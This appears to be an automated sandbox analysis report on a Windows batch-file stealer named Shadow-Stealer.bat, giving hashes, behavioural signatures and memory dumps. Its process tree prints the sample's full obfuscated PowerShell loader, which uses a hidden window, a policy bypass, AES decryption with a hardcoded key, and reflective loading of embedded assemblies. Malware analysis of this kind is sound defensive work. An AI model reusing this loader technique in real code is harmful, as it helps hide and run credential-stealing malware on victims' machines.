84ba648cfdd5c2ae8d3292fcc1702e385a1a26e915bd7275b5fde776212f2724

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
16-06-2024 18:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Shadow-Stealer.bat
Size

12.5MB
MD5

cf5b412ffc3ce43cd7ddce602fc67f56
SHA1

221dfcd0868158f676c472d8a5bcf9647f0c7d51
SHA256

84ba648cfdd5c2ae8d3292fcc1702e385a1a26e915bd7275b5fde776212f2724
SHA512

695489d3b02863c382dc4b044bd80825b3f46eadfe4647619a0036da7ab3405b7925e89a457b19ee57995a59dcf8d5f9df237cd4d5d59a6cee3914aeaee2a8ef
SSDEEP

49152:mmlB6XvIxKx/znMtw4e/x4dA+ilmm5C5rsw1y1lkGxJW5RXLnfaWixbVoZmb0nYk:b

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

Shadow-Stealer.bat.exe

pid process

1144 Shadow-Stealer.bat.exe
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

1708 cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

Shadow-Stealer.bat.exe

pid process

1144 Shadow-Stealer.bat.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

Shadow-Stealer.bat.exe

description pid process

Token: SeDebugPrivilege 1144 Shadow-Stealer.bat.exe

pid	process
1144	Shadow-Stealer.bat.exe

pid	process
1708	cmd.exe

pid	process
1144	Shadow-Stealer.bat.exe

description	pid	process
Token: SeDebugPrivilege	1144	Shadow-Stealer.bat.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 1708 wrote to memory of 1144	1708	cmd.exe	Shadow-Stealer.bat.exe
PID 1708 wrote to memory of 1144	1708	cmd.exe	Shadow-Stealer.bat.exe
PID 1708 wrote to memory of 1144	1708	cmd.exe	Shadow-Stealer.bat.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1708

C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe
"Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1144

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe
Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/1144-5-0x000007FEF545E000-0x000007FEF545F000-memory.dmp

Filesize
4KB

Download
memory/1144-6-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

Filesize
2.9MB

Download
memory/1144-9-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

Filesize
9.6MB

Download
memory/1144-10-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

Filesize
9.6MB

Download
memory/1144-11-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

Filesize
9.6MB

Download
memory/1144-8-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

Filesize
9.6MB

Download
memory/1144-7-0x00000000002D0000-0x00000000002D8000-memory.dmp

Filesize
32KB

Download
memory/1144-12-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

Filesize
9.6MB

Download
memory/1144-13-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

Filesize
9.6MB

Download